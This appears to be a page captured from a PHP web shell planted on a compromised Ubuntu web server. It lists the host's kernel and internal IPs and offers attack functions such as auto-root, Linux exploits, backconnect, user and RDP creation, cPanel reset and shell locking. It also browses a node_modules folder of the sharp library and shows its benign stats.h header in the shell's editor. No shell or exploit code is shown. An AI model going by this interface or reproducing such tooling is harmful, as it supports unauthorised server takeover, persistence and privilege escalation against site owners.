Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
sharp /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
binding.gyp
9.62
KB
-rw-rw-r--
common.cc
36.83
KB
-rw-rw-r--
common.h
10.41
KB
-rw-rw-r--
metadata.cc
10.75
KB
-rw-rw-r--
metadata.h
1.57
KB
-rw-rw-r--
operations.cc
15.39
KB
-rw-rw-r--
operations.h
3.3
KB
-rw-rw-r--
pipeline.cc
79.05
KB
-rw-rw-r--
pipeline.h
9.18
KB
-rw-rw-r--
sharp.cc
1.43
KB
-rw-rw-r--
stats.cc
6.5
KB
-rw-rw-r--
stats.h
1.18
KB
-rw-rw-r--
utilities.cc
8.71
KB
-rw-rw-r--
utilities.h
677
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stats.h
// Copyright 2013 Lovell Fuller and others. // SPDX-License-Identifier: Apache-2.0 #ifndef SRC_STATS_H_ #define SRC_STATS_H_ #include <string> #include <napi.h> #include "./common.h" struct ChannelStats { // stats per channel int min; int max; double sum; double squaresSum; double mean; double stdev; int minX; int minY; int maxX; int maxY; ChannelStats(int minVal, int maxVal, double sumVal, double squaresSumVal, double meanVal, double stdevVal, int minXVal, int minYVal, int maxXVal, int maxYVal): min(minVal), max(maxVal), sum(sumVal), squaresSum(squaresSumVal), mean(meanVal), stdev(stdevVal), minX(minXVal), minY(minYVal), maxX(maxXVal), maxY(maxYVal) {} }; struct StatsBaton { // Input sharp::InputDescriptor *input; // Output std::vector<ChannelStats> channelStats; bool isOpaque; double entropy; double sharpness; int dominantRed; int dominantGreen; int dominantBlue; std::string err; StatsBaton(): input(nullptr), isOpaque(true), entropy(0.0), sharpness(0.0), dominantRed(0), dominantGreen(0), dominantBlue(0) {} }; Napi::Value stats(const Napi::CallbackInfo& info); #endif // SRC_STATS_H_
Close